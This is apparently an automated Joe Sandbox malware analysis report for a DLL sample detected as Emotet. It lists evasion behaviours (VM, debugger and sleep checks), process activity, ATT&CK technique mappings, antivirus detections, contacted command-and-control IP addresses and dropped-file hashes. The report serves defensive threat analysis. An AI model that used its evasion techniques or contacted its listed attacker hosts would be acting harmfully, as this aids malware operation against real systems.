                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 1692 Thread sleep time: -150000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 340 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 5688 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_3-10574
                      Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-10597
                      Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 5.9 %
                      Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 4.7 %
                      Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exe API call chain: ExitProcess graph end node graph_3-10599
                      Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.9.dr Binary or memory string: VMware
                      Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.9.dr Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
                      Source: Amcache.hve.9.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
                      Source: svchost.exe, 00000018.00000002.863748399.000002E116062000.00000004.00000001.sdmp Binary or memory string: @Hyper-V RAW
                      Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.9.dr Binary or memory string: VMware7,1
                      Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: svchost.exe, 00000015.00000002.527636071.000001E0BCC7F000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.527944145.000001E0BCCEE000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.526784558.000001E0BCC7F000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863698910.000002E11604C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
                      Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.me
                      Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: svchost.exe, 00000018.00000002.863117295.000002E110A29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`c
                      Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1002DB0D
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1003E278
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10002D40 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,3_2_10002D40
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D3F7F7 mov eax, dword ptr fs:[00000030h] 0_2_00D3F7F7
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0366F7F7 mov eax, dword ptr fs:[00000030h] 5_2_0366F7F7
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D3C6B8 LdrInitializeThunk,0_2_00D3C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1003A8D4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10032CB9

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 69.16.218.101 144
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 45.138.98.34 80
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528
                      Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,3_2_1003E000
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_1003D098
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,3_2_1002129B
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_1003D35E
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,3_2_1003850E
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_1003D7AE
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,4_2_1003E000
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,4_2_1003D098
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_1003D8C5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,4_2_1003D95D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_1003D9D1
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_1003F9F4
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,4_2_1003EA86
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,4_2_1002129B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,4_2_1003EABA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,4_2_1003D35E
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_1003DBA3
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_1003EBF9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_1003DC64
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_1003DCCB
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,4_2_1003DD07
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,4_2_1003850E
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,4_2_1003CE40
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,4_2_1003D7AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_1003C7D2
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1003732F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_1003732F
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10024F01 _memset,GetVersionExA,4_2_10024F01
                      Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,3_2_10001160
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10001160 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,4_2_10001160

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Native API 2 | DLL Side-Loading 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 2 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | DLL Side-Loading 1 | Security Account Manager | System Information Discovery 35 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | File Deletion 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 2 | LSA Secrets | Security Software Discovery 51 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 3 | Cached Domain Credentials | Virtualization/Sandbox Evasion 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Regsvr32 1 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                      Behavior Graph

                      [Figure not reproduced: behavior graph. Behavior Graph ID: 553377, Sample: ALNgwfVtrB, Startdate: 14/01/2022, Architecture: WINDOWS, Score: 92]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      ALNgwfVtrB.dll | 15% | Virustotal |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      6.2.rundll32.exe.5640000.6.unpack | 100% | Avira | HEUR/AGEN.1145233
                      0.0.loaddll32.exe.b50000.3.unpack | 100% | Avira | HEUR/AGEN.1145233
                      0.0.loaddll32.exe.d30000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.53c0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.2.rundll32.exe.56d0000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.2.rundll32.exe.5490000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.2.rundll32.exe.5460000.4.unpack | 100% | Avira | HEUR/AGEN.1145233
                      0.0.loaddll32.exe.b50000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                      6.2.rundll32.exe.53b0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.5200000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
                      6.2.rundll32.exe.5a90000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      4.2.rundll32.exe.46a0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                      5.2.rundll32.exe.54c0000.4.unpack | 100% | Avira | HEUR/AGEN.1145233
                      5.2.rundll32.exe.55d0000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      4.2.rundll32.exe.46d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.2.rundll32.exe.5930000.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.5630000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.55a0000.6.unpack | 100% | Avira | HEUR/AGEN.1145233
                      6.2.rundll32.exe.56a0000.8.unpack | 100% | Avira | HEUR/AGEN.1145233
                      0.0.loaddll32.exe.d30000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.2.rundll32.exe.5380000.2.unpack | 100% | Avira | HEUR/AGEN.1145233
                      5.2.rundll32.exe.5600000.8.unpack | 100% | Avira | HEUR/AGEN.1145233
                      6.2.rundll32.exe.4e60000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.33b0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                      6.2.rundll32.exe.5670000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      3.2.regsvr32.exe.4020000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                      10.2.rundll32.exe.3080000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                      6.2.rundll32.exe.33d0000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                      5.2.rundll32.exe.54f0000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.3660000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      10.2.rundll32.exe.4a10000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.2.rundll32.exe.5900000.10.unpack | 100% | Avira | HEUR/AGEN.1145233
                      6.2.rundll32.exe.5a60000.12.unpack | 100% | Avira | HEUR/AGEN.1145233
                      3.2.regsvr32.exe.4050000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      0.2.loaddll32.exe.b50000.0.unpack | 100% | Avira | HEUR/AGEN.1145233
                      0.2.loaddll32.exe.d30000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
                      https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
                      https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
                      http://help.disneyplus.com. | 0% | URL Reputation | safe
                      https://disneyplus.com/legal. | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://upx.sf.net | Amcache.hve.9.dr | false | | high
                      https://www.tiktok.com/legal/report/feedback | svchost.exe, 00000015.00000003.504317499.000001E0BD583000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504779704.000001E0BDA19000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504403415.000001E0BD594000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.504445076.000001E0BD5A5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://help.disneyplus.com. | svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://disneyplus.com/legal. | svchost.exe, 00000015.00000003.503188635.000001E0BD571000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                        Contacted IPs


                        Public


                        Private

                        IP
                        127.0.0.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:553377
                        Start date:14.01.2022
                        Start time:19:31:37
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 15m 25s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:ALNgwfVtrB (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:27
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal92.troj.evad.winDLL@28/15@0/28
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 45.1% (good quality ratio 41.9%)
                        • Quality average: 73.2%
                        • Quality standard deviation: 28%
                        HCA Information:
                        • Successful, ratio: 65%
                        • Number of executed functions: 39
                        • Number of non-executed functions: 187
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.91.112.76, 23.213.168.66
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes were analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
                        19:33:51 | API Interceptor | 10x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8192
                        Entropy (8bit):0.3593198815979092
                        Encrypted:false
                        SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                        MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                        SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                        SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                        SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                        Process:C:\Windows\System32\svchost.exe
                        File Type:MPEG-4 LOAS
                        Category:dropped
                        Size (bytes):1310720
                        Entropy (8bit):0.2494552734353501
                        Encrypted:false
                        SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU45:BJiRdwfu2SRU45
                        MD5:ACEC30FA0B2887F7209FFA7C485EF3E6
                        SHA1:729B9EBF8483F0E62F50146AB125A7E594EE5397
                        SHA-256:012529C218728BF9B3632898D3B6DAD496391C68D17E00E5B3B7D519D3B63238
                        SHA-512:CB8A710D87BE4A10A5690DFE99CD1F3ED52E252068BECDFCA3CB72F8B717680FCBA77B4DD4C7346911D8961B9CBB9FB629117C66E30132E6B5FAC13A7F1D08FC
                        Malicious:false
                        Reputation:unknown
                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                        Process:C:\Windows\System32\svchost.exe
                        File Type:Extensible storage user DataBase, version 0x620, checksum 0x1ff79e9b, page size 16384, Windows version 10.0
